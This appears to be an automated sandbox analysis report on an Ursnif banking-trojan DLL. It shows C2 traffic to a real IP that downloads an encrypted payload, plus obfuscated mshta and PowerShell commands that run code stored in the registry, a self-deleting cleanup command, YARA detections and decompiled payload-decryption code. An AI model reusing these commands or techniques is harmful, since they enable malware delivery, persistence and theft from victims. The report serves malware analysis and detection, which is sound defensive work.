                              Data Raw: 3b 4c 6b f7 b7 25 70 03 88 2d 7a 37 9e a1 c8 64 0b d8 31 31 97 0f c5 b0 5f f3 81 6d 9e c3 45 83 0a 34 18 f9 2a 0e ff 72 ff c7 33 d5 29 5d 81 f6 a5 6c 33 59 c7 fc d9 7d 59 a6 2c 44 a0 08 b0 48 8b 5c 88 ed 4d 9c 4e f2 9c 04 cf da 87 8f fc 28 44 1b 1f d6 84 bb dc 53 47 f0 25 da f7 b6 56 48 26 5b 83 11 f9 80 79 d3 3f ab 3f 7b 8a 14 23 8f 4d 34 6e a5 8d 52 88 cb c6 51 bd 4e 27 49 d6 ba 33 30 b3 e5 52 76 59 f9 49 45 bb 09 82 03 75 7c e0 12 67 43 e1 33 8e b9 58 1e 5a b6 16 2b cf ae 0e 8d cd e6 c9 bb 31 32 9c b6 7f 38 ef b7 14 c5 6b 56 72 db db f5 20 42 b0 21 7b c2 d3 e4 6b fa b6 29 2f 63 6f 43 cf fd 33 d1 f1 f3 33 82 eb 56 90 92 b4 a4 9c 0b 34 10 8d ed df d7 30 79 ee 6a 70 e6 2e 5b 2f d9 bf ad 8c 81 5f ec d7 15 c8 85 f6 42 0f 37 b8 b0 93 ac a1 85 c4 23 5e e0 43 b2 f2 93 6a d4 39 18 f6 17 0d d7 36 b6 2c 4f 0e 34 06 73 fa a7 52 3b a0 32 82 5c f1 6b e4 7a 99 fc 8d 27 58 8a 96 1b 31 e8 14 ee 43 b7 d2 fb 67 09 cb 2e 03 64 ad e4 8a 6a 5f 40 27 ac a0 21 ac cd 7a c6 94 f3 0b 04 1c f4 15 03 a5 59 24 02 68 2c 35 6a 8b 51 d7 90 e5 d9 30 8a 7f dc c2 68 ae 3c 42 9a 5c 68 06 a5 c2 c4 6e 0f ef 64 32 4f 69 ab 18 b4 9e 99 1f f5 05 56 47 02 8e 9f 27 d4 ff 10 20 e7 ed cd b1 4b 87 6e 27 42 1e 3e 24 80 4a 04 3c a3 49 30 16 f6 80 ec ff 7f 69 7e 67 e9 15 f7 0c 8d 63 a1 52 09 e9 b1 0e 05 e9 aa 92 c3 6e a8 af a5 9b c3 81 03 f7 56 3b 62 cc 61 4a 47 01 5f 44 7c dd 73 98 b0 56 89 42 12 05 2f fd 1e 39 b9 f3 98 27 a9 28 d5 bc c4 8e a4 e7 ec ab 89 c4 ce 19 ea b9 9c 21 dc 88 24 ec 64 2b cb a0 eb bf ca ae d2 49 96 b6 8a 04 ab fa 95 77 fa 63 0a 7a 0d 95 a1 96 99 44 58 4c cf 57 ae a4 39 c8 34 1e 91 57 0a 36 63 09 ab 63 76 c2 c1 18 dd ac c2 70 bf 06 25 e6 27 5d fc f2 4f 2b 48 d4 2b 9b aa 75 25 b7 70 f5 86 3b 83 06 05 3f 10 6e 86 51 69 da a6 a8 0d 8f 67 9f 77 dd f3 f1 bc a3 2b 9b cc 07 3c cd d5 4d 2e 5b 8d 0a 6e f3 42 ee 85 31 81 12 49 42 23 da f6 e0 21 58 34 f1 98 44 20 e0 34 20 6c e2 a7 e9 96 39 bf 64 eb 96 ab af dd c2 e5 93 2f 77 12 5b 31 b6 d4 8e 98 e1 b0 b9 97 01 7b 07 2a 86 59 bd e8 00 a8 a3 36 12 48 2c f4 25 13 19 ba df bb ee 61 56 99 a8 ad 21 38 93 bd 47 26 58 af f0 db 46 7b b6 65 aa de cd dc 57 71 ed 57 29 3c a1 90 6f b4 ca a6 dc 2b a1 45 2a 15 3d 27 0d 14 ac e3 a7 f3 ce f4 a4 99 60 7c d7 95 79 41 ca 61 9a 6f 54 40 1a 4e 73 8d c8 57 85 c6 32 d8 e6 76 bd 9e 2b c8 77 57 64 55 68 1e e8 b8 ce e3 27 ea 88 e0 6b 84 d6 22 a8 40 53 1f fe fd 7f 2c 64 e5 e3 c0 ba b0 7c 8c 1f 0a 1f 3d a3 aa df 4c 84 66 69 de c4 52 16 4a cb 9d 1b 22 74 04 be b4 75 aa ac 10 43 9c 84 24 1d 8b bb 5b c6 a9 da 99 7a c4 10 3c d8 88 4e 6f 5d 84 05 33 69 2b e5 f6 16 bf 76 b7 e2 b7 61 1a 36 95 4b 28 79 75 83 0d af 82 36 39 fb e4 c0 3c c2 32 b4 cc c4 35 09 29 45 a8 bf a7 f5 c5 b1 91 71 b2 a5 a9 77 0d 1f 79 f3 f3 6c a3 ab 52 a9 26 9e df 64 d9 64 a6 4f 74 f8 7f be 12 b6 01 54 bd bc e1 a6 7e 85 e2 01 e7 11 f6 40 6c 49 4a e2 ec 18 e1 9b c7 7e 26 d7 09 41 4c b1 bd cb b6 91 c6 24 7f 1a 3d 1b 36 89 c0 c2 20 6c 33 01 13 79 75 f9 66 8c 40 13 41 38 66 3a 0f 9b 37 54 93 3b 5b 14 19 90 ea 68 99 54 78 3a f9 f4 73 f6
                              Data Ascii: ;Lk%p-z7d11_mE4*r3)]l3Y}Y,DH\MN(DSG%VH&[y??{#M4nRQN'I30RvYIEu|gC3XZ+128kVr B!{k)/coC33V40yjp.[/_B7#^Cj96,O4sR;2\kz'X1Cg.dj_@'!zY$h,5jQ0h<B\hnd2OiVG' Kn'B>$J<I0i~gcRnV;baJG_D|sVB/9'(!$d+IwczDXLW94W6ccvp%']O+H+u%p;?nQigw+<M.[nB1IB#!X4D 4 l9d/w[1{*Y6H,%aV!8G&XF{eWqW)<o+E*='`|yAaoT@NsW2v+wWdUh'k"@S,d|=LfiRJ"tuC$[z<No]3i+va6K(yu69<25)EqwylR&ddOtT~@lIJ~&AL$=6 l3yuf@A8f:7T;[hTx:s
                              May 4, 2022 16:28:13.314977884 CEST952OUTGET /drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlk HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: 185.189.151.28
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              May 4, 2022 16:28:13.619457006 CEST954INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Wed, 04 May 2022 14:28:13 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 1856
                              Connection: keep-alive
                              Pragma: public
                              Accept-Ranges: bytes
                              Expires: 0
                              Cache-Control: must-revalidate, post-check=0, pre-check=0
                              Content-Disposition: inline; filename="62728d7d90c22.bin"
                              Data Raw: 9b a0 46 9f fb 74 7e 4c 02 9a 3e fd d9 71 c7 75 b7 c0 cf a4 f1 8f 69 7b ca 68 40 93 06 4e b2 61 6c 45 b6 60 ec c8 ae 61 ba a7 30 65 32 00 93 c4 61 b5 26 75 0f 9c 24 d6 6b 8d 49 83 bd 29 e5 c2 8e 84 e2 03 a7 53 8f 50 53 4e 60 d2 b0 83 79 b0 30 aa 56 2b de 37 b8 1e 29 a1 fe 12 f0 a4 8a b6 1c 50 54 8d e2 11 22 11 00 28 bf 5a 8e 88 5c f1 a5 ea 66 e4 d9 1d 25 32 3c 0d b9 88 74 8f 8e 4d dd 6f 8d 0c ff 3b fb ab 12 a8 aa 7b 3c 4a 84 d1 1c 81 c0 03 d3 5a f7 ca 0e 84 a2 cd bf 4b 4b 8a 9a a7 0b 3b 18 09 93 80 bd 2c 22 aa 10 18 d9 46 7f 3f 4a 98 a1 32 15 53 4d 52 37 e7 3d fc df 0b 99 86 dc 6e 28 45 31 41 af 5b f3 54 b8 c3 c4 0e de b4 8c 35 e7 ae 58 26 d9 51 48 2a a9 7c 38 bf 34 02 be a4 a2 60 c2 f2 a1 0b a5 b7 b8 45 00 65 8d 87 9e 0f 13 57 99 55 9c 6f 29 be 48 cb 2b 94 3e 15 dc a9 ca 66 19 e4 4b 96 5f 82 fb 25 15 6c e8 81 ba c7 c6 11 8f a6 22 f3 d3 46 8e 0a 4e a3 47 a3 43 c4 28 a9 04 8e 33 96 50 fc ff da 85 d8 1a 90 b6 c3 b6 70 00 35 37 e8 e0 9b 16 3a 8f 42 cc df f8 46 d9 65 92 fb a4 09 89 80 4b ed 32 53 0c fb 12 10 01 3c a7 65 18 1f 85 a3 3d 19 3b 35 60 ca 34 5d 34 52 31 52 97 a4 f7 e9 c8 a8 6d fd aa 00 d9 1a 03 b4 cf d3 6b 1d c9 a9 fb 98 be 9e ee 6e 98 aa dc 13 43 f5 f1 a4 c8 15 60 ac 89 bc 66 0e c3 5c 86 cf 87 08 78 b0 d7 93 ca a5 f3 d7 df 9f 82 0e 0c 47 f8 ba bb 22 96 1d 41 af ad 20 bb 3b f4 7c 43 d6 33 6b c5 a7 00 ad c7 e3 85 36 3d a9 cd ff 43 13 5d 1a 98 65 a5 39 a0 04 97 16 f2 aa 48 11 c3 92 11 ad e2 6c a1 be f1 26 93 a6 ac 32 e7 cb 42 6c f0 44 33 e2 1d 8e ae 3e b7 6c 0e 9d d6 61 ea 8a 3d 3b f9 10 d5 5e 6f e6 95 69 c6 71 9b d9 76 5a d7 a6 6d 73 3c 9c 16 98 fe 91 6c 22 21 a9 0d a3 b8 32 ec 0c e2 56 21 bd 0f b2 d9 7d 28 84 dc 5c 0a d0 73 cb ab bd 78 b6 e9 06 c7 a0 94 a6 59 4e d2 71 5b 21 08 5b 65 ac e4 58 76 1e 02 c8 9f 0d dd e0 90 25 a2 63 d5 df 0d 62 e9 e1 79 ab 4a 3b 73 dc 24 a2 34 4b 8e f7 84 e2 34 b7 48 aa f8 38 8e 40 82 ea 3e f7 65 c4 e9 55 1e 1c 09 eb 5f e8 d6 e0 be 03 c7 53 d9 7b 75 89 9d 91 ca e8 cf 8b fc 0e a2 1d 8b 29 79 32 6b ce 7d 50 cd 11 62 8e 9f e2 49 17 42 32 80 05 48 f4 b4 02 6d 95 48 d1 8f cf 58 79 80 88 10 83 25 2d 9c d3 a5 62 18 d5 cb e7 f6 ab c9 05 71 9d 97 91 57 12 95 83 e4 1e 21 ce 98 59 64 61 16 0c bc 86 44 3f 1e 63 85 6a b9 bb dc da c8 93 85 f0 15 ac 87 e7 0f bb 30 62 68 64 d9 35 20 8f a7 46 82 e0 bf e8 92 a0 37 1b 44 4e 09 c2 70 7b 5d ca 65 06 92 d7 1f 02 40 68 d8 f9 ce fe 22 b9 52 d6 37 3d 79 f5 4c bd 14 0c 30 6c e6 2b 48 c0 26 30 b8 43 9d de c8 55 66 eb 9d 88 ce 14 7f 49 50 c5 3f 64 97 0f 7a 4f 48 80 11 af 12 1c 95 66 bf ed ec e1 bd 12 35 7c da 51 24 8f b3 9f f8 1f 9b c0 d9 50 46 63 0f d2 4e 5c 43 00 32 a9 65 5a c3 30 73 8d 98 fa ff 3a 7d c3 b4 d5 ea d1 45 9c 4b 6c 69 1c f6 b4 3a 55 5c 5c 0e de 2a c7 47 93 6d ec 2b 02 99 c6 7b 5d ce 41 e3 ee c9 91 46 6e d4 10 d2 83 3e f6 91 b5 c3 ce d1 b9 12 29 94 e4 5a 7d ac dd 03 fc 4e 8f 4c 65 3e b6 12 c0 2b 6d 73 2a f6 b1 df bd a5 1d 5a 13 b6 7f a5 ca e1 33 ca 6b a4 88 3e c4 2e dd b1 9f 2c 6b 18 5e de cf fe 3b 59 3c 35 5f cf 58 4b 80 b6 2b aa 8f fe 2c ed d8 3b 2e 42 bb af 6f c1
                              Data Ascii: Ft~L>qui{h@NalE`a0e2a&u$kI)SPSN`y0V+7)PT"(Z\f%2<tMo;{<JZKK;,"F?J2SMR7=n(E1A[T5X&QH*|84`EeWUo)H+>fK_%l"FNGC(3Pp57:BFeK2S<e=;5`4]4R1RmknC`f\xG"A ;|C3k6=C]e9Hl&2BlD3>la=;^oiqvZms<l"!2V!}(\sxYNq[![eXv%cbyJ;s$4K4H8@>eU_S{u)y2k}PbIB2HmHXy%-bqW!YdaD?cj0bhd5 F7DNp{]e@h"R7=yL0l+H&0CUfIP?dzOHf5|Q$PFcN\C2eZ0s:}EKli:U\\*Gm+{]AFn>)Z}NLe>+ms*Z3k>.,k^;Y<5_XK+,;.Bo


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:1
                              Start time:16:27:32
                              Start date:04/05/2022
                              Path:C:\Windows\System32\loaddll32.exe
                              Wow64 process (32bit):true
                              Commandline:loaddll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll"
                              Imagebase:0xa60000
                              File size:116736 bytes
                              MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:2
                              Start time:16:27:33
                              Start date:04/05/2022
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                              Imagebase:0x1100000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:3
                              Start time:16:27:33
                              Start date:04/05/2022
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                              Imagebase:0x1360000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              Target ID:9
                              Start time:16:28:17
                              Start date:04/05/2022
                              Path:C:\Windows\System32\mshta.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kmli='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kmli).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                              Imagebase:0x7ff76df90000
                              File size:14848 bytes
                              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:10
                              Start time:16:28:19
                              Start date:04/05/2022
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                              Imagebase:0x7ff619710000
                              File size:447488 bytes
                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              Target ID:11
                              Start time:16:28:20
                              Start date:04/05/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff77f440000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:14
                              Start time:16:28:36
                              Start date:04/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                              Imagebase:0x7ff6db380000
                              File size:2739304 bytes
                              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:moderate

                              Target ID:15
                              Start time:16:28:38
                              Start date:04/05/2022
                              Path:C:\Windows\System32\control.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\control.exe -h
                              Imagebase:0x7ff79bdc0000
                              File size:117760 bytes
                              MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate

                              Target ID:16
                              Start time:16:28:38
                              Start date:04/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP"
                              Imagebase:0x7ff7f0560000
                              File size:47280 bytes
                              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Target ID:17
                              Start time:16:28:43
                              Start date:04/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                              Imagebase:0x7ff6db380000
                              File size:2739304 bytes
                              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              Target ID:18
                              Start time:16:28:48
                              Start date:04/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP"
                              Imagebase:0x7ff7f0560000
                              File size:47280 bytes
                              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Target ID:19
                              Start time:16:28:52
                              Start date:04/05/2022
                              Path:C:\Windows\explorer.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Explorer.EXE
                              Imagebase:0x7ff74fc70000
                              File size:3933184 bytes
                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Target ID:21
                              Start time:16:29:09
                              Start date:04/05/2022
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll
                              Imagebase:0x7ff602050000
                              File size:273920 bytes
                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Target ID:22
                              Start time:16:29:10
                              Start date:04/05/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff77f440000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Target ID:23
                              Start time:16:29:10
                              Start date:04/05/2022
                              Path:C:\Windows\System32\PING.EXE
                              Wow64 process (32bit):false
                              Commandline:ping localhost -n 5
                              Imagebase:0x7ff6dcd20000
                              File size:21504 bytes
                              MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Target ID:24
                              Start time:16:29:23
                              Start date:04/05/2022
                              Path:C:\Windows\System32\RuntimeBroker.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                              Imagebase:0x7ff7b5d10000
                              File size:99272 bytes
                              MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Reset < >

                                Control-flow Graph

                                C-Code - Quality: 58%
                                			E01065FBB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                				int _v8;
                                				long* _v12;
                                				int _v16;
                                				BYTE* _v20;
                                				long* _v24;
                                				void* _v39;
                                				char _v40;
                                				void _v56;
                                				int _v60;
                                				intOrPtr _v64;
                                				void _v67;
                                				char _v68;
                                				void* _t61;
                                				int _t68;
                                				signed int _t76;
                                				int _t79;
                                				int _t81;
                                				int _t85;
                                				long _t86;
                                				int _t90;
                                				signed int _t94;
                                				int _t101;
                                				BYTE* _t102;
                                				int _t103;
                                				void* _t104;
                                				void* _t105;
                                				void* _t106;
                                
                                				_t103 = __eax;
                                				_t94 = 6;
                                				_v68 = 0;
                                				memset( &_v67, 0, _t94 << 2);
                                				_t105 = _t104 + 0xc;
                                				asm("stosw");
                                				asm("stosb");
                                				_v40 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosw");
                                				asm("stosb");
                                				_t61 =  *0x106a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                                				if(_t61 == 0) {
                                					_a8 = GetLastError();
                                				} else {
                                					_t101 = 0x10;
                                					memcpy( &_v56, _a8, _t101);
                                					_t106 = _t105 + 0xc;
                                					_v60 = _t101;
                                					_v67 = 2;
                                					_v64 = 0x660e;
                                					_v68 = 8;
                                					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                                					if(_t68 == 0) {
                                						_a8 = GetLastError();
                                					} else {
                                						_push(0);
                                						_push( &_v40);
                                						_push(1);
                                						_push(_v12);
                                						if( *0x106a0e4() == 0) {
                                							_a8 = GetLastError();
                                						} else {
                                							_t18 = _t103 + 0xf; // 0x10
                                							_t76 = _t18 & 0xfffffff0;
                                							if(_a4 != 0 && _t76 == _t103) {
                                								_t76 = _t76 + _t101;
                                							}
                                							_t102 = E01066D63(_t76);
                                							_v20 = _t102;
                                							if(_t102 == 0) {
                                								_a8 = 8;
                                							} else {
                                								_v16 = 0;
                                								_a8 = 0;
                                								while(1) {
                                									_t79 = 0x10;
                                									_v8 = _t79;
                                									if(_t103 <= _t79) {
                                										_v8 = _t103;
                                									}
                                									memcpy(_t102, _a12, _v8);
                                									_t81 = _v8;
                                									_a12 = _a12 + _t81;
                                									_t103 = _t103 - _t81;
                                									_t106 = _t106 + 0xc;
                                									if(_a4 == 0) {
                                										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                                									} else {
                                										_t85 =  *0x106a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                                									}
                                									if(_t85 == 0) {
                                										break;
                                									}
                                									_t90 = _v8;
                                									_v16 = _v16 + _t90;
                                									_t102 =  &(_t102[_t90]);
                                									if(_t103 != 0) {
                                										continue;
                                									} else {
                                										L17:
                                										 *_a16 = _v20;
                                										 *_a20 = _v16;
                                									}
                                									goto L21;
                                								}
                                								_t86 = GetLastError();
                                								_a8 = _t86;
                                								if(_t86 != 0) {
                                									E01066C2C(_v20);
                                								} else {
                                									goto L17;
                                								}
                                							}
                                						}
                                						L21:
                                						CryptDestroyKey(_v12);
                                					}
                                					CryptReleaseContext(_v24, 0);
                                				}
                                				return _a8;
                                			}






























                                0x01065fc4
                                0x01065fca
                                0x01065fcd
                                0x01065fd3
                                0x01065fd3
                                0x01065fd5
                                0x01065fd7
                                0x01065fda
                                0x01065fe0
                                0x01065fe1
                                0x01065fe2
                                0x01065fe8
                                0x01065fed
                                0x01065ff3
                                0x01065ffb
                                0x01066158
                                0x01066001
                                0x01066003
                                0x0106600c
                                0x01066011
                                0x01066023
                                0x01066026
                                0x0106602a
                                0x01066031
                                0x01066035
                                0x0106603d
                                0x01066143
                                0x01066043
                                0x01066043
                                0x01066047
                                0x01066048
                                0x0106604a
                                0x01066055
                                0x0106612f
                                0x0106605b
                                0x0106605b
                                0x0106605e
                                0x01066064
                                0x0106606a
                                0x0106606a
                                0x01066072
                                0x01066074
                                0x01066079
                                0x01066120
                                0x0106607f
                                0x01066085
                                0x01066088
                                0x0106608b
                                0x0106608d
                                0x0106608e
                                0x01066093
                                0x01066095
                                0x01066095
                                0x0106609f
                                0x010660a4
                                0x010660a7
                                0x010660aa
                                0x010660ac
                                0x010660b5
                                0x010660df
                                0x010660b7
                                0x010660c8
                                0x010660c8
                                0x010660e7
                                0x00000000
                                0x00000000
                                0x010660e9
                                0x010660ec
                                0x010660ef
                                0x010660f3
                                0x00000000
                                0x010660f5
                                0x01066104
                                0x0106610a
                                0x01066112
                                0x01066112
